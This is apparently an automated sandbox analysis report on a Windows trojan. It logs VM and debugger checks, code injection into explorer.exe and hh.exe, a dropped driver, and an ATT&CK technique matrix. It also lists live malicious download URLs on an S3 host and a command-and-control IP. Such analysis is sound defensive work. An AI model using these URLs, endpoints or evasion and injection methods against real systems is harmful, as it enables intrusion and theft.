Source: explorer.exe, 0000000F.00000003.2157266324.000000000BA70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000@v
Source: explorer.exe, 0000000F.00000003.2169523059.000000000B95E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: nrGkqbCyKP.exe, 00000000.00000002.2000645988.0000000008950000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.11.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.11.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: explorer.exe, 0000000F.00000002.2747312781.000000000774A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
Source: explorer.exe, 0000000F.00000003.2168821231.000000000BB59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATAu
Source: Amcache.hve.11.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: explorer.exe, 0000000F.00000003.2146195587.0000000008F1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
Source: explorer.exe, 0000000F.00000002.2732831633.0000000000D38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000000F.00000003.2157266324.000000000BA70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00\4&224f42ef&0&000000
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FF79D074EE0 GetLastError,IsDebuggerPresent,OutputDebugStringW,6_2_00007FF79D074EE0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FF79D074EE0 GetLastError,IsDebuggerPresent,OutputDebugStringW,6_2_00007FF79D074EE0
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FF79D0743EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF79D0743EC
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B04628 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FFBC1B04628
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B20AD8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FFBC1B20AD8
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B7D460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FFBC1B7D460
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FF79D0743EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00007FF79D0743EC
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD29D460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00007FFBAD29D460
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBB50E0AD8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00007FFBB50E0AD8
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBBC154628 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00007FFBBC154628
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeMemory allocated: C:\Windows\hh.exe base: 1E47A9F0000 protect: page read and writeJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeMemory allocated: C:\Windows\explorer.exe base: B70000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeMemory allocated: C:\Windows\explorer.exe base: B30000 protect: page read and writeJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeNtUnmapViewOfSection: Indirect: 0x7FF79D0E9162Jump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeNtMapViewOfSection: Indirect: 0x7FF79D0E91CEJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeNtMapViewOfSection: Indirect: 0x7FF79D0E8C91Jump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeMemory written: PID: 4084 base: B70000 value: E8Jump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeMemory written: PID: 4084 base: B30000 value: 00Jump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeThread register set: target process: 4780Jump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeMemory written: C:\Windows\hh.exe base: 1E47A9F0000Jump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeMemory written: C:\Windows\explorer.exe base: B70000Jump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeMemory written: C:\Windows\explorer.exe base: B30000Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe "C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe" Jump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeProcess created: C:\Windows\hh.exe C:\windows\hh.exeJump to behavior
Source: hh.exe, 00000008.00000002.2733664877.000001E47AB38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 minProgram Manager
Source: explorer.exe, 0000000C.00000000.2018417447.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047240712.00000000044D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000C.00000000.2018417447.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.2045354903.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2017985543.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
Source: explorer.exe, 0000000C.00000000.2018417447.0000000001091000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
Source: explorer.exe, 0000000C.00000000.2018417447.0000000001091000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: explorer.exe, 0000000F.00000003.2058579314.000000000762E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.000000000762E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2060084622.0000000007649000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndW
Source: explorer.exe, 0000000C.00000002.2048969994.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2022719564.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd]1Q
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: ___lc_locale_name_func,__crtGetLocaleInfoEx,6_2_00007FFBC1B5F930
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW,6_2_00007FFBC1B39B90
Source: C:\Windows\hh.exeCode function: gethostname,gethostbyname,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,GetNativeSystemInfo,K32GetProcessImageFileNameW,GetLogicalDriveStringsW,CoInitializeEx,CoCreateInstance,RegOpenKeyExW,GetLocaleInfoW,GetCurrentHwProfileW,RegOpenKeyExW,RegDeleteValueW,RegCreateKeyW,RegSetValueExW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,8_2_000001E47C4E6370
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: ___lc_locale_name_func,__crtGetLocaleInfoEx,22_2_00007FFBAD27F930
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW,22_2_00007FFBAD259B90
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeQueries volume information: C:\Users\user\Desktop\nrGkqbCyKP.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FF79D01DD10 GetSystemTimeAsFileTime,6_2_00007FF79D01DD10
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C511F88 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,8_2_000001E47C511F88
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.11.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.11.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: explorer.exe, 0000000F.00000002.2750262921.0000000008F1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Windows Defender\MSASCui.exe
Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.11.drBinary or memory string: MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Replication Through Removable Media
1
Native API
1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
1
Disable or Modify Tools
2
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
2
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter
1
Windows Service
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory11
Peripheral Device Discovery
Remote Desktop Protocol2
Input Capture
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Windows Service
1
Abuse Elevation Control Mechanism
Security Account Manager3
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron1
Registry Run Keys / Startup Folder
412
Process Injection
2
Obfuscated Files or Information
NTDS26
System Information Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
Scheduled Task/Job
1
Software Packing
LSA Secrets1
Query Registry
SSHKeylogging3
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
Registry Run Keys / Startup Folder
1
Timestomp
Cached Domain Credentials351
Security Software Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSync151
Virtualization/Sandbox Evasion
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
Masquerading
Proc Filesystem3
Process Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Modify Registry
/etc/passwd and /etc/shadow1
Application Window Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron151
Virtualization/Sandbox Evasion
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd412
Process Injection
Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577407 Sample: nrGkqbCyKP.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 46 anydesk17.s3.ap-east-1.amazonaws.com 2->46 48 s3-r-w.ap-east-1.amazonaws.com 2->48 50 api.msn.com 2->50 68 Suricata IDS alerts for network traffic 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 Antivirus detection for URL or domain 2->72 74 4 other signatures 2->74 9 nrGkqbCyKP.exe 15 13 2->9         started        13 explorer.exe 50 128 2->13         started        16 zfon.exe 2->16         started        signatures3 process4 dnsIp5 52 3.5.237.170, 443, 49719, 49720 AMAZON-02US United States 9->52 54 s3-r-w.ap-east-1.amazonaws.com 3.5.239.146, 443, 49709, 49718 AMAZON-02US United States 9->54 56 2 other IPs or domains 9->56 36 C:\Users\user\...\vcruntime140_1.dll, PE32+ 9->36 dropped 38 C:\Users\user\...\libcef, PE32+ 9->38 dropped 40 C:\Users\user\AppData\...\nrGkqbCyKP.exe.log, ASCII 9->40 dropped 42 3 other files (none is malicious) 9->42 dropped 18 zfon.exe 9->18         started        88 Query firmware table information (likely to detect VMs) 13->88 21 zfon.exe 16->21         started        file6 signatures7 process8 signatures9 60 Detected unpacking (overwrites its own PE header) 18->60 62 Writes to foreign memory regions 18->62 64 Allocates memory in foreign processes 18->64 66 Modifies the context of a thread in another process (thread injection) 18->66 23 zfon.exe 1 2 18->23         started        26 hh.exe 3 1 18->26         started        process10 dnsIp11 76 Injects code into the Windows Explorer (explorer.exe) 23->76 78 Writes to foreign memory regions 23->78 80 Allocates memory in foreign processes 23->80 82 Found direct / indirect Syscall (likely to bypass EDR) 23->82 30 WerFault.exe 19 16 23->30         started        32 WerFault.exe 16 23->32         started        34 explorer.exe 1 2 23->34 injected 58 27.50.63.8, 4433, 49724 BCPL-SGBGPNETGlobalASNSG Singapore 26->58 44 C:\ProgramData\kernelquick.sys, data 26->44 dropped 84 Sample is not signed and drops a device driver 26->84 86 Tries to detect sandboxes / dynamic malware analysis system (QueryWinSAT) 26->86 file12 signatures13 process14

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
nrGkqbCyKP.exe24%ReversingLabsByteCode-MSIL.Trojan.Zilla
SourceDetectionScannerLabelLink
C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\MSVCP140.dll0%ReversingLabs
C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\VCRUNTIME140.dll0%ReversingLabs
C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\libcef24%ReversingLabsWin64.Trojan.DllHijack
C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\vcruntime140_1.dll0%ReversingLabs
C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://ns.adobe.co0%Avira URL Cloudsafe
https://anydesk17.s3.ap-east-1.amazonaws.com/aut.png100%Avira URL Cloudmalware
https://www.battle.net/shop/simplecheckout/navbar0%Avira URL Cloudsafe
https://android.notify.windows.com/iOSA40%Avira URL Cloudsafe
https://anydesk17.s3.ap-east-1.amazonaws.com/(0%Avira URL Cloudsafe
https://anydesk17.s3.ap-east-1.amazonaws.com/MSVCP140.dll0%Avira URL Cloudsafe
https://powerpoint.office.comer0%Avira URL Cloudsafe
https://anydesk17.s3.ap-east-1.amazonaws.com/0%Avira URL Cloudsafe
https://anydesk17.s3.ap-east-1.amazonaws.com/view.png100%Avira URL Cloudmalware
http://n.ad8j0%Avira URL Cloudsafe
https://www.battle.net/shop/simplecheckout/error0%Avira URL Cloudsafe
https://anydesk17.s3.ap-east-1.amazonaws.comH0%Avira URL Cloudsafe
https://www.battle.net/shop/simplecheckout/debug-harness0%Avira URL Cloudsafe
https://www.battle.net/shop/simplecheckout/loadinghttps://www.battle.net/shop/simplecheckout/navbarh0%Avira URL Cloudsafe
http://anydesk17.s3.ap-east-1.amazonaws.com0%Avira URL Cloudsafe
http://s3-r-w.ap-east-1.amazonaws.comd0%Avira URL Cloudsafe
https://android.notify.windows.com/iOSd0%Avira URL Cloudsafe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k0%Avira URL Cloudsafe
http://anydesk17.s3.ap-east-1.amazonaws.comd0%Avira URL Cloudsafe
https://anydesk17.s3.ap-east-1.amazonaws.com/vcruntime140_1.dll0%Avira URL Cloudsafe
http://ns.adobe0%Avira URL Cloudsafe
https://anydesk17.s3.ap-east-1.amazonaws.com/VCRUNTIME140.dll0%Avira URL Cloudsafe
http://ns.ad0%Avira URL Cloudsafe
http://ns.adobeS0%Avira URL Cloudsafe
https://www.huya.com00%Avira URL Cloudsafe
https://anydesk17.s3.ap-east-1.amazonaws.com/zfon.exe0%Avira URL Cloudsafe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark0%Avira URL Cloudsafe
https://www.battle.net/shop/simplecheckout/error?error=0%Avira URL Cloudsafe
https://word.office.com480%Avira URL Cloudsafe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA0%Avira URL Cloudsafe
https://anydesk17.s3.ap-east-1.amazonaws.com/libcef.dll100%Avira URL Cloudmalware
https://www.battle.net/shop/simplecheckout/loading0%Avira URL Cloudsafe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
s3-r-w.ap-east-1.amazonaws.com
3.5.239.146
truefalse
    high
    anydesk17.s3.ap-east-1.amazonaws.com
    unknown
    unknowntrue
      unknown
      api.msn.com
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://anydesk17.s3.ap-east-1.amazonaws.com/aut.pngfalse
        • Avira URL Cloud: malware
        unknown
        https://anydesk17.s3.ap-east-1.amazonaws.com/view.pngfalse
        • Avira URL Cloud: malware
        unknown
        https://anydesk17.s3.ap-east-1.amazonaws.com/MSVCP140.dllfalse
        • Avira URL Cloud: safe
        unknown
        https://anydesk17.s3.ap-east-1.amazonaws.com/vcruntime140_1.dllfalse
        • Avira URL Cloud: safe
        unknown
        https://anydesk17.s3.ap-east-1.amazonaws.com/VCRUNTIME140.dllfalse
        • Avira URL Cloud: safe
        unknown
        https://anydesk17.s3.ap-east-1.amazonaws.com/zfon.exefalse
        • Avira URL Cloud: safe
        unknown
        https://anydesk17.s3.ap-east-1.amazonaws.com/libcef.dllfalse
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 0000000C.00000002.2048969994.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2022719564.00000000090DA000.00000004.00000001.00020000.00000000.sdmpfalse
          high
          https://powerpoint.office.comerexplorer.exe, 0000000C.00000002.2053283744.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2025979008.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://android.notify.windows.com/iOSA4explorer.exe, 0000000C.00000000.2025979008.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2053283744.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://anydesk17.s3.ap-east-1.amazonaws.com/nrGkqbCyKP.exefalse
          • Avira URL Cloud: safe
          unknown
          http://ocsp.sectigo.com0nrGkqbCyKP.exefalse
            high
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                http://ns.adobe.coexplorer.exe, 0000000F.00000003.2065246181.0000000004B64000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000000C.00000000.2022719564.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2130807598.0000000009091000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.0000000009091000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2146195587.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2750262921.0000000009085000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2122983745.000000000908A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126233626.0000000009091000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://www.battle.net/shop/simplecheckout/navbarzfon.exe, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
